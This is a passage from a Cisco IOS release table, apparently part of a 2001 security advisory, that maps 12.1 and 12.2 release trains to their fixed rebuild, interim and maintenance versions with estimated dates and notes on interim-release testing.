    |               |series          |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Early Deployment|             |            |              |
    |    12.1XU     |(ED) limited    |12.1(5)XU1   |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1XV     |early deployment|12.1(5)XV3   |            |              |
    |               |release         |2001-July    |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |Not Scheduled                            |
    |    12.1XW     |early deployment+-----------------------------------------+
    |               |release         |Upgrade recommended to 12.2DD            |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1XX     |early deployment|             |            |12.1(6)EZ     |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1XY     |early deployment|12.1(5)XY6   |            |              |
    |               |release         |2001-July    |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1XZ     |early deployment|12.1(5)XZ4   |            |              |
    |               |release         |2001-July    |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1YA     |early deployment|             |            |              |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1YB     |early deployment|12.1(5)YB4   |            |              |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1YC     |early deployment|12.1(5)YC1   |            |              |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1YD     |early deployment|12.1(5)YD2   |            |              |
    |               |release         |2001-June-25 |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.1YF     |early deployment|12.1(5)YF2   |            |              |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |      12.2-based Releases       |   Rebuild   | Interim**  |  Maintenance |
    +---------------+----------------+-------------+------------+--------------+
    |               |General         |             |            |              |
    |     12.2      |deployment      |12.2(1b)     |12.2(1.1)   |12.2(3)       |
    |               |release for all |             |            |2001-August   |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |General         |             |            |              |
    |    12.2T      |deployment      |             |12.2(2.2)T  |              |
    |               |release for all |             |            |              |
    |               |platforms       |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |    12.2XA     |SPLOB           |             |            |12.2(2)XA     |
    |               |                |             |            |2001-July-02  |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.2XD     |early deployment|12.2(1)XD1   |            |              |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.2XE     |early deployment|             |            |12.2(1)XE     |
    |               |release         |             |            |              |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.2XH     |early deployment|             |            |12.2(1)XH     |
    |               |release         |             |            |2001-June-25  |
    +---------------+----------------+-------------+------------+--------------+
    |               |Short-lived     |             |            |              |
    |    12.2XQ     |early deployment|             |            |12.2(1)XQ     |
    |               |release         |             |            |2001-June-23  |
    +---------------+----------------+-------------+------------+--------------+
    |                                   Notes                                  |
    +--------------------------------------------------------------------------+
    | * All dates are estimated and subject to change.                         |
    |                                                                          |
    | ** Interim releases are subjected to less rigorous testing than regular  |
    | maintenance releases, and may have serious bugs.                         |
    +--------------------------------------------------------------------------+